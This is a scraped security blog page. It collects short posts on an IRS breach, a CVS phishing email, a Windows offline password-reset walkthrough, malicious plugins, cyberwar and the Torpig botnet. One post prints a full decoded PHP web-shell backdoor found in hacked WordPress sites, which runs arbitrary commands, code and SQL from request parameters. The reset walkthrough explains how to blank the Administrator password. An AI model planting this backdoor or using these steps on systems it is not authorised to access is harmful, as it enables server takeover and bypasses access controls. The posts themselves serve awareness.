IRS

IRS Reports 700,000 U.S. Taxpayers Hacked And 47 Million ‘Get Transcripts’ Ordered

Another 390,000 taxpayer accounts have been identified as potentially accessed by thieves that hacked into the IRS’s “Get Transcript” online application, the IRS said Friday, bringing the total number of accounts affected to approximately 724,000.

The breach was discovered last May, when the IRS initially identified possible unauthorized access of about 114,000 taxpayer accounts. Then, last August, the IRS revised that figure to 334,000. The application on the IRS website, launched in January 2014, was intended to allow taxpayers to more easily obtain records of their prior tax filings. It has remained suspended since the data breach was first discovered.

– See more at: http://www.journalofaccountancy.com/news/2016/feb/irs-get-transcript-data-breach-worse-201613967.html#sthash.3T7hcm9T.dpuf

 

CVS ExtraCare Card

Scam – Attn: Your CVS ExtraCare Card Has Been Updated – Must Confirm

This email contains a link to a possible malware site:

 

CVS Extra Care Rewards Program
DATE: 1/12/16

IMPORTANT MESSAGE FOR CVS CARD HOLDER: YOUR EMAIL

Your CVS Extra Care Savings & Rewards Card Has Been Updated.

To be sure you keep all of your points that you’ve accumulated over the years shopping at CVS (both market and pharmacy), you must visit the link below to start using your new rewards.

Link REMOVED – Goes to possible malware site
**Reward #3833 will expire on 1/16/16. Don’t Forget!

VirusTotal:

URL Scanner Result
Sucuri SiteCheck Malicious site
ParetoLogic Malware site
reset-password

Windows Password Recovery: ONTPRE

Offline NT Password & Registry Editor (ONTP&RE)

Did you lock yourself out of your Windows system?  Forgot your Windows password?  What is the best Windows password recovery?

The best way is to have a Windows Recovery disc ready.  But this is something you must do BEFORE you get locked out.

reset-password

reset-password

There are tools you can use to get into your system, but the first think you should try is to use “Administrator” as the user with no password.  “Administrator” is a default account on Windows systems.  On Windows 7 it is disabled by default but if someone has used the account you may be able to use it as backdoor into the system.

If their is not Administrator account and no Windows Recovery disc you will have to use a Windows password recovery tool.  ONTP&RE is a password recovery tool that allows quick access to windows systems.

Reset Password : Windows 7

1.  Download ONTP&E: First, download the Windows password recovery software from pogostick.net . pogostick.net/~pnh/ntpasswd/cd110511.zip

2.  Unzip ONTP&E:  Files are compressed into 1 folder named ( cd110511.zip).  Unzip the file.

3.  Create CD with ISO:  Set the cd disc creator into ‘image to  disc’’. Burn the image to the cd.  Each CD burner software is different, so you will have to figure out how to create a CD from the ISO.  Sometimes its as easy as double clicking the ISO but it depends on the type of software.

4.  Reboot & Insert:  Actually, you need to make sure your Windows system is able to boot from the CD.  Once its done , insert the cd back to the CD ROM  and reboot your computer.

5.   Computer Boot from CD:  As your computer reboots, keep hitting F2 to go through the BIOS.  Select “Boot Options”.  Some versions of BIOS call this “Boot”.  But the idea is the same.  Go into the BIOS and make sure CDROM is on the top of the list for boot options.  This means that the computer first looks at the CD before going to the Hard Drive.  Instructions on modifying BIOS settings will be listed on the page.

6.  Boot into ONTRE:  Once the BIOS boot option is set, save and exit.  Your system will boot into your ONTRE disc.  Software will start running. Just follow the steps.  “Press enter” to boot into the “Offline NT Password & Registry Editor” CD.

windows password recovery

screen shot of Offline NT Password & Registry Editor

7.  Select an Account:  It will ask you to select an account.  If you hit “Enter” it will automatically boot into the [Administrator] account.

*note: Anything in [brackets] is the default value, so if you hit “Enter” it will auto-magically choose that [bracket] value.. its a linux thing.. you wouldn’t understand.

If you choose the “Administrator” account, you may need to Enable the account since the built-in Administrator account is  disabled by default in certain versions of Windows.

8.  Enable Built-in Administrator Account:  The Windows account  needs to be enabled.  Select 4  and enter ‘to Unlock and enable user Account’.

windows ontpre menu enable

windows ontpre menu

9.  Clear (blank) User Password:  After selecting 4-Unlock and Enable user account, you will be sent back to the User Edit Menu. If you want to clear the Administrator password (if it has one) then hit enter or type Administrator and Select 1 and “Enter” – to clear the user password.

10.  Save Changes:  Once you have made all the changes you want (enabled the Administrator account & cleared any passwords), you are ready for the next step.  Hit  ‘!’ and enter.

Windows Password save changes

Windows ONTP&RE password save change

On the screen it asks ‘What to do’?  hit q to quit. You will see:

Step FOUR:  Writing back changes

“About to write file(s) back.  Do it ?’’

Hit   Y  and enter to save changes.

11.  Last Step:  Hit “Ctrl-Alt-Del” to reboot and eject the cd quickly.  This will allow the system to boot into Windows on the Hard drive.

You can now login as “Administrator” with NO password.

Once you are in as Administrator you can change passwords of any local accounts in Control Panel | Users.

Evil Plug-ins

I love plug-ins! I love them on Firefox, WordPress, Dreamweaver and now on Chrome. It has crossed my mind that some of these plug-ins could be created and distributed by very smart people with criminal or mischievous intent. But the reality of bad plug-ins didn’t hit me until I noticed a link on digg.com about Stealing Logins using Google Chrome Extensions. I am no programmer but understand enough to see how cleaver it is.

Basically, someone creates a innocent looking extension or plug-in, they distribute it and the innocent looking plug-in/extension sends your personal information to where ever.

How can a person avoid this?! I guess the safest way would be to not use ANY plug-ins and extensions.. but that is over kill.
I know that I am pretty paranoid about WordPress extensions/plug-ins but the open source community is pretty good about peer reviewing, testing and reviewing some of the more popular plug-ins. When it comes to software I depend heavily on reviews of others who have used the product. If there are no reviews (even on forums or dev/plug-in sites), I usually consider the app to risky.

Sometimes what I do is try the app/extension/plug-in on a site/blog I don’t care as much about. In the case of browser plug-ins, I use a single trusted browser with minimal plug-ins to do important sensitive/personal transactions. Most of the stuff I do on the web does not require so much scrutiny.

Unfortunately, there is always a risk with plug-ins, apps, and extensions. All we can really do is manage the risk, by being careful and suspicious.

Thanks Mr. Grech for the knowledge.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

Wordpress Magic Attack

Wordpress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

*Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists('______safeshell'))

{

function ______safeshell($komut) {

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

if (!empty ($komut)) {

if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('system') && !in_array('system', $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

@ exec($komut, $res);

$res = join("\n", $res);

echo $res, "\n";

}

elseif (@ is_resource($f = @ popen($komut, "r"))) {

//$res = "";

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

}

}

};

if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

echo "\n";

if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

}

else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

if (!$result)

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

die();

}

};

echo "\n\n";

die();

};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

Jeff Moss + DHS = Super Security

“Godfather of Hackers” Jeff Moss, founder of the Black Hat and Defcon hacker and security conferences, was sworn in as one of the new members of the Department of Homeland Security’s Advisory Council (HSAC). And we think it’s a shrewd and thoughtful move. Obama seems to be getting serious about cyber security now by hiring “Dark Tangent.”

on gizmodo

Jeff Moss is not only a celebrity in the world of hacking, he is also a powerbroker. He is a respected force to be reckoned with. I am not going to say that I think he is some sort of cyber mafia boss but I will say that he could destroy just about anyone with a 100 word post on a forum. Getting “street cred” in the hacker world is something that must be truly earned usually by technical expertise proven by hundreds or even thousands of your hacker peers validated by published technical papers, famous/infamous system infiltrations, the discovery of 0-day exploits that make major corporations take notice, or some combination of these.

Jeff has his finger on the pulse of the entire spectrum of hacking.

Jeff is now going to advise the president.

Now that is good judgement.

You Hack US, We Nuke You!

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters –

Security Focus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S, hand, but no proof at all allowing plausible deniability. It should be black Ops hacks, very well coordinated, very well funded and full time.

I don’t think the US can be complacent or wrecklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy handed when it comes to one of its most valuable asset, information.

Weaponized Hacking

This is not your momma hacking. This is militarized hacking, Pentagon style. It is state funded with the intent of allowing the killing of people and the breaking of things.

“U.S. Defense Department officials were so impressed with the level of coordination between ground military ops and cyberattacks against strategical targets during the recent conflicts, that they are now looking for ways to weaponize hacking. Aviation Week glanced at such a device and reports that it is being designed to be easily used even by non-techy soldiers.”
softpedia

Welcome to the neo-CyberArms race! Where uncontrollable cyber weapons that can turn off cities and detonate public utility plants with the touch of a button! This is not the beginning of a William Gibson novel, this is not the synopsis of Snow Crash, or the theme of a cyberpunk trilogy this is reality… virtual reality.

On a serious note, I think China has already weaponized hacking. Hopefully, this is not the first time the US has thought about this.

Torpig Botnet Hijacked

Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel, Giovanni Vigna of the Security Group Department of Computer Science University of California in Santa Barbara hacked into a botnet called Torpig.

Torpig gathers credit card, bank accounts and other sensitive data and sends it to criminals. The botnet had stolen 70 GB of data.

The security group took advantage of the open, decentralized nature of peer-to-peer to infiltrate it. Victims are infected by drive-by-download attacks.

They use phishing sites and advertise them on google, facebook, myspace and other popular sites. They also use email. To hijack the botnet they exploited a vulnerability in the way the malware generates a list of domains it contacts.

http://www.cs.ucsb.edu/~seclab/projects/torpig/torpig.pdf

Not becoming a victim in the first place is the most ideal situation, however. The researchers concluded that victims of botnets are usually those with poorly maintained machines and who choose “easily guessable” passwords. ” This is evidence that the malware problem is fundamentally a cultural problem,” reads the report. “Even though people are educated and understand well concepts such as the physical security and the necessary maintenance of a car, they do not understand the consequences of irresponsible behavior when using a computer.” – Jacqui Chen

Pentagon Hacked Via Major Companies

21 April 2009. Recently hackers got into the Pentagon through connection to the Northrop & Lockheed networks. The hackers originated from China. The Chinese, of course, “opposes and forbids all forms of cyber crimes.”

They stole some data related to the $300 billion dollar Joint Strike Fighter project.

Maybe its time to tight the security between military and civilian enclaves. Just an idea. Realistically companies that have that much involvement in projects like this should actually have the same level of security as the Pentagon. Otherwise all the Pentagon’s security is useless due to the Northop/Lockheed backdoor.

1 2 3 4